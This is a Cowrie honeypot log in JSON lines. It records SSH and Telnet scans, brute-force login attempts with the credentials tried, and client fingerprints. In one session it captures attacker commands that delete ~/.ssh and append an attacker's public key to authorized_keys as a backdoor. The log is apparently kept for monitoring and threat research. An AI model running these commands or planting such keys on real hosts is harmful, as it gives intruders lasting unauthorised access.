":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:34:00.250041Z","src_ip":"24.108.102.132","session":"9b7b0d974bc4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:34:00.910527Z","src_ip":"24.108.102.132","session":"9b7b0d974bc4"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:01.073097Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:01.084486Z","src_ip":"24.108.102.132","session":"9b7b0d974bc4"}
{"eventid":"cowrie.session.closed","duration":12.805973052978516,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:09.786467Z","src_ip":"212.227.125.160","session":"6b470babfbd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42855,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a065881c34d","protocol":"telnet","message":"New connection: 212.227.125.160:42855 (1.2.3.4:23) [session: 6a065881c34d]","sensor":"my-vps","timestamp":"2025-08-26T00:34:10.003315Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":43904,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f8b7410f1ba","protocol":"ssh","message":"New connection: 27.112.78.245:43904 (1.2.3.4:22) [session: 5f8b7410f1ba]","sensor":"my-vps","timestamp":"2025-08-26T00:34:20.847425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:34:20.848369Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:34:21.117349Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.session.closed","duration":12.803882598876953,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:22.807088Z","src_ip":"212.227.125.160","session":"6a065881c34d"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer1234!@#$","message":"login attempt [root/Qwer1234!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:34:22.820096Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43176,"dst_ip":"1.2.3.4","dst_port":23,"session":"bfbe608cf769","protocol":"telnet","message":"New connection: 212.227.125.160:43176 (1.2.3.4:23) [session: bfbe608cf769]","sensor":"my-vps","timestamp":"2025-08-26T00:34:23.041841Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:34:23.424227Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:34:23.424941Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:34:23.425921Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:23.694553Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:34:24.248097Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:34:24.248858Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:34:24.518467Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:24.519305Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":37132,"dst_ip":"1.2.3.4","dst_port":22,"session":"1aa3bc01cd32","protocol":"ssh","message":"New connection: 27.112.78.245:37132 (1.2.3.4:22) [session: 1aa3bc01cd32]","sensor":"my-vps","timestamp":"2025-08-26T00:34:24.804553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:34:24.806835Z","src_ip":"27.112.78.245","session":"1aa3bc01cd32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:34:25.680740Z","src_ip":"27.112.78.245","session":"1aa3bc01cd32"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:34:26.719297Z","src_ip":"27.112.78.245","session":"1aa3bc01cd32"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:28.548388Z","src_ip":"27.112.78.245","session":"1aa3bc01cd32"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":37146,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eeba4922dff","protocol":"ssh","message":"New connection: 27.112.78.245:37146 (1.2.3.4:22) [session: 7eeba4922dff]","sensor":"my-vps","timestamp":"2025-08-26T00:34:28.807745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:34:28.808446Z","src_ip":"27.112.78.245","session":"7eeba4922dff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:34:29.068452Z","src_ip":"27.112.78.245","session":"7eeba4922dff"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:34:30.154020Z","src_ip":"27.112.78.245","session":"7eeba4922dff"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:30.457215Z","src_ip":"27.112.78.245","session":"5f8b7410f1ba"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:30.458338Z","src_ip":"27.112.78.245","session":"7eeba4922dff"}
{"eventid":"cowrie.session.closed","duration":12.781145811080933,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:35.822920Z","src_ip":"212.227.125.160","session":"bfbe608cf769"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43499,"dst_ip":"1.2.3.4","dst_port":23,"session":"6f60cc3fb9fb","protocol":"telnet","message":"New connection: 212.227.125.160:43499 (1.2.3.4:23) [session: 6f60cc3fb9fb]","sensor":"my-vps","timestamp":"2025-08-26T00:34:36.015522Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58091,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ada2e8b34bd","protocol":"telnet","message":"New connection: 212.227.125.160:58091 (1.2.3.4:23) [session: 2ada2e8b34bd]","sensor":"my-vps","timestamp":"2025-08-26T00:34:43.903195Z"}
{"eventid":"cowrie.session.closed","duration":12.84480619430542,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:48.860255Z","src_ip":"212.227.125.160","session":"6f60cc3fb9fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43838,"dst_ip":"1.2.3.4","dst_port":23,"session":"d652b0f20213","protocol":"telnet","message":"New connection: 212.227.125.160:43838 (1.2.3.4:23) [session: d652b0f20213]","sensor":"my-vps","timestamp":"2025-08-26T00:34:49.060808Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":36470,"dst_ip":"1.2.3.4","dst_port":22,"session":"517d30cf62ca","protocol":"ssh","message":"New connection: 45.159.112.103:36470 (1.2.3.4:22) [session: 517d30cf62ca]","sensor":"my-vps","timestamp":"2025-08-26T00:34:52.256525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:34:52.258377Z","src_ip":"45.159.112.103","session":"517d30cf62ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:34:52.362876Z","src_ip":"45.159.112.103","session":"517d30cf62ca"}
{"eventid":"cowrie.login.failed","username":"git","password":"M3gaP33!","message":"login attempt [git/M3gaP33!] failed","sensor":"my-vps","timestamp":"2025-08-26T00:34:52.824318Z","src_ip":"45.159.112.103","session":"517d30cf62ca"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":53050,"dst_ip":"1.2.3.4","dst_port":22,"session":"45f684a443e4","protocol":"ssh","message":"New connection: 36.89.28.139:53050 (1.2.3.4:22) [session: 45f684a443e4]","sensor":"my-vps","timestamp":"2025-08-26T00:34:53.010751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:34:53.011707Z","src_ip":"36.89.28.139","session":"45f684a443e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:34:53.231440Z","src_ip":"36.89.28.139","session":"45f684a443e4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:53.931315Z","src_ip":"45.159.112.103","session":"517d30cf62ca"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123456","message":"login attempt [git/git123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:34:54.154940Z","src_ip":"36.89.28.139","session":"45f684a443e4"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:55.377084Z","src_ip":"36.89.28.139","session":"45f684a443e4"}
{"eventid":"cowrie.session.connect","src_ip":"184.105.139.69","src_port":23734,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fd1489ed1aa","protocol":"ssh","message":"New connection: 184.105.139.69:23734 (1.2.3.4:22) [session: 9fd1489ed1aa]","sensor":"my-vps","timestamp":"2025-08-26T00:34:57.350303Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T00:34:57.351337Z","src_ip":"184.105.139.69","session":"9fd1489ed1aa"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:34:57.352147Z","src_ip":"184.105.139.69","session":"9fd1489ed1aa"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":59742,"dst_ip":"1.2.3.4","dst_port":22,"session":"150d045188d2","protocol":"ssh","message":"New connection: 24.108.102.132:59742 (1.2.3.4:22) [session: 150d045188d2]","sensor":"my-vps","timestamp":"2025-08-26T00:34:58.319752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:34:58.325102Z","src_ip":"24.108.102.132","session":"150d045188d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:34:58.493251Z","src_ip":"24.108.102.132","session":"150d045188d2"}
{"eventid":"cowrie.login.failed","username":"helpdesk","password":"helpdesk","message":"login attempt [helpdesk/helpdesk] failed","sensor":"my-vps","timestamp":"2025-08-26T00:34:59.147229Z","src_ip":"24.108.102.132","session":"150d045188d2"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:00.315979Z","src_ip":"24.108.102.132","session":"150d045188d2"}
{"eventid":"cowrie.session.closed","duration":12.754518270492554,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:01.815262Z","src_ip":"212.227.125.160","session":"d652b0f20213"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44142,"dst_ip":"1.2.3.4","dst_port":23,"session":"42be75acbbf9","protocol":"telnet","message":"New connection: 212.227.125.160:44142 (1.2.3.4:23) [session: 42be75acbbf9]","sensor":"my-vps","timestamp":"2025-08-26T00:35:02.039946Z"}
{"eventid":"cowrie.session.closed","duration":30.504562377929688,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:14.407686Z","src_ip":"212.227.125.160","session":"2ada2e8b34bd"}
{"eventid":"cowrie.session.closed","duration":12.780885696411133,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:14.820689Z","src_ip":"212.227.125.160","session":"42be75acbbf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44459,"dst_ip":"1.2.3.4","dst_port":23,"session":"b123acd697b2","protocol":"telnet","message":"New connection: 212.227.125.160:44459 (1.2.3.4:23) [session: b123acd697b2]","sensor":"my-vps","timestamp":"2025-08-26T00:35:15.059484Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43102,"dst_ip":"1.2.3.4","dst_port":22,"session":"6653705106ca","protocol":"ssh","message":"New connection: 212.227.125.160:43102 (1.2.3.4:22) [session: 6653705106ca]","sensor":"my-vps","timestamp":"2025-08-26T00:35:23.596413Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003B\\xe7\u001a\\x9a\\xc6\u0011)\\xd7\\xd7\\xed\\xafb\\x88I\\xbf\\xfe\u04c5,9\\xa3\\x82S\u000b\\xa0\\x81k.\u00118\\xb3\\xea\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003B\\xe7\u001a\\x9a\\xc6\u0011)\\xd7\\xd7\\xed\\xafb\\x88I\\xbf\\xfe\u04c5,9\\xa3\\x82S\u000b\\xa0\\x81k.\u00118\\xb3\\xea\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-26T00:35:23.597182Z","src_ip":"212.227.125.160","session":"6653705106ca"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:23.598201Z","src_ip":"212.227.125.160","session":"6653705106ca"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.101","src_port":58374,"dst_ip":"1.2.3.4","dst_port":22,"session":"5159448d10c4","protocol":"ssh","message":"New connection: 196.251.85.101:58374 (1.2.3.4:22) [session: 5159448d10c4]","sensor":"my-vps","timestamp":"2025-08-26T00:35:26.620286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:35:26.936644Z","src_ip":"196.251.85.101","session":"5159448d10c4"}
